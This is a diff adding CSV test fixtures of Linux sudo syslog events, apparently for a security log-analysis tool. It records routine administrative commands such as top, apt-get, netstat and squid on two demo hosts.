+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:10:09.1Z,squid-uk-02,2019-07-05T18:10:09Z,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user omsagent by peteb(uid=0),null,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,omsagent,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:11.07Z,UbuntuDevEnv,2019-07-05T18:18:35Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/top,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/top,/usr/bin/top
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:18:35.137Z,UbuntuDevEnv,2019-07-05T18:18:35Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:34.567Z,UbuntuDevEnv,2019-07-05T18:19:34Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:11.07Z,UbuntuDevEnv,2019-07-05T18:19:34Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/crontab -l,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/crontab -l,/usr/bin/crontab
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:04:11.07Z,UbuntuDevEnv,2019-07-05T18:19:52Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/bin/bash,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/bin/bash,/bin/bash
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:19:52.877Z,UbuntuDevEnv,2019-07-05T18:19:52Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:48.813Z,UbuntuDevEnv,2019-07-05T18:20:48Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get update,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/apt-get update,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:48.817Z,UbuntuDevEnv,2019-07-05T18:20:48Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:57.58Z,UbuntuDevEnv,2019-07-05T18:20:57Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:20:57.58Z,UbuntuDevEnv,2019-07-05T18:20:57Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/apt-get upgrade -y,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/apt-get upgrade -y,/usr/bin/apt-get
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:28:44.557Z,UbuntuDevEnv,2019-07-05T18:28:44Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/var/log/audit   USER=root   COMMAND=/usr/bin/top,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/usr/bin/top,/usr/bin/top
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:28:44.56Z,UbuntuDevEnv,2019-07-05T18:28:44Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:29:11.453Z,UbuntuDevEnv,2019-07-05T18:29:11Z,authpriv,UbuntuDevEnv,notice,peteb : TTY=pts/1   PWD=/var/log/audit   USER=root   COMMAND=/bin/netstat -antp,null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,,,/bin/netstat -antp,/bin/netstat
+b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-05T18:29:11.453Z,UbuntuDevEnv,2019-07-05T18:29:11Z,authpriv,UbuntuDevEnv,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),null,10.0.1.4,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Sucess,peteb,root,,
diff --git a/tests/testdata/sudo_events.csv b/tests/testdata/sudo_events.csv
new file mode 100644
index 000000000..d6368745c
--- /dev/null
+++ b/tests/testdata/sudo_events.csv
@@ -0,0 +1,5 @@
+,TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,SudoResult,Sudoer,SudoTo,Command,CommandCall
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10 15:13:07,squid-uk-02,2019-07-10 15:13:07,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+1,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10 15:13:26,squid-uk-02,2019-07-10 15:13:25,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid,/usr/sbin/squid
+2,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10 15:13:26,squid-uk-02,2019-07-10 15:13:25,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+3,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-10 15:13:26,squid-uk-02,2019-07-10 15:13:26,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
diff --git a/tests/testdata/sudo_session_test.csv b/tests/testdata/sudo_session_test.csv
new file mode 100644
index 000000000..5ddbdef6c
--- /dev/null
+++ b/tests/testdata/sudo_session_test.csv
@@ -0,0 +1,79 @@
+,TenantId,SourceSystem,TimeGenerated,Computer,EventTime,Facility,HostName,SeverityLevel,SyslogMessage,ProcessID,HostIP,ProcessName,MG,Type,_ResourceId,SudoResult,Sudoer,SudoTo,Command,CommandCall
+0,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:44:44,squid-uk-02,2019-07-15 02:44:43,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid -NCd1,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid -NCd1,/usr/sbin/squid
+1,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:44:44,squid-uk-02,2019-07-15 02:44:43,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+2,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:44:57,squid-uk-02,2019-07-15 02:44:57,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+3,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:45:00,squid-uk-02,2019-07-15 02:44:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+4,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:45:30,squid-uk-02,2019-07-15 02:45:29,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+5,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:45:53,squid-uk-02,2019-07-15 02:45:52,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid -NCd1,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid -NCd1,/usr/sbin/squid
+6,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:45:53,squid-uk-02,2019-07-15 02:45:52,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+7,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:46:00,squid-uk-02,2019-07-15 02:45:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+8,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:46:04,squid-uk-02,2019-07-15 02:46:04,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+9,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:00,squid-uk-02,2019-07-15 02:46:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+10,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:12,squid-uk-02,2019-07-15 02:47:12,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/sbin/squid,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/sbin/squid,/usr/sbin/squid
+11,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:12,squid-uk-02,2019-07-15 02:47:12,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+12,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:12,squid-uk-02,2019-07-15 02:47:12,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+13,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:26,squid-uk-02,2019-07-15 02:47:25,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+14,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:26,squid-uk-02,2019-07-15 02:47:25,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/usr/bin/vim rc.local,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/usr/bin/vim rc.local,/usr/bin/vim
+15,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:31,squid-uk-02,2019-07-15 02:47:31,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+16,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:40,squid-uk-02,2019-07-15 02:47:40,authpriv,squid-uk-02,info,pam_unix(sudo:session): session opened for user root by peteb(uid=0),,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,peteb,root,,
+17,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:47:40,squid-uk-02,2019-07-15 02:47:40,authpriv,squid-uk-02,notice,peteb : TTY=pts/0   PWD=/home/peteb   USER=root   COMMAND=/bin/bash,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,,/bin/bash,/bin/bash
+18,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:48:00,squid-uk-02,2019-07-15 02:47:59,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+19,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:48:35,squid-uk-02,2019-07-15 02:48:35,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+20,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:49:00,squid-uk-02,2019-07-15 02:49:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+21,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:50:00,squid-uk-02,2019-07-15 02:50:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+22,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:51:00,squid-uk-02,2019-07-15 02:51:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+23,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:52:00,squid-uk-02,2019-07-15 02:52:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+24,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:53:00,squid-uk-02,2019-07-15 02:53:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+25,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:54:01,squid-uk-02,2019-07-15 02:54:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+26,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:55:01,squid-uk-02,2019-07-15 02:55:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+27,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:56:01,squid-uk-02,2019-07-15 02:56:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+28,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:57:01,squid-uk-02,2019-07-15 02:57:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+29,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:58:01,squid-uk-02,2019-07-15 02:58:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+30,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 02:59:01,squid-uk-02,2019-07-15 02:59:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+31,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:00:01,squid-uk-02,2019-07-15 03:00:00,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+32,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:00:27,squid-uk-02,2019-07-15 03:00:26,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+33,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:01:01,squid-uk-02,2019-07-15 03:01:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+34,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:02:01,squid-uk-02,2019-07-15 03:02:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+35,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:03:01,squid-uk-02,2019-07-15 03:03:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+36,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:04:01,squid-uk-02,2019-07-15 03:04:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+37,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:05:01,squid-uk-02,2019-07-15 03:05:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+38,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:06:01,squid-uk-02,2019-07-15 03:06:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+39,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:07:02,squid-uk-02,2019-07-15 03:07:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+40,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:08:02,squid-uk-02,2019-07-15 03:08:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+41,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:09:02,squid-uk-02,2019-07-15 03:09:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
+42,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-07-15 03:10:02,squid-uk-02,2019-07-15 03:10:01,authpriv,squid-uk-02,info,pam_unix(sudo:session): session closed for user root,,10.0.6.5,sudo,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/proxy/providers/microsoft.compute/virtualmachines/squid-uk-02,Sucess,,root,,
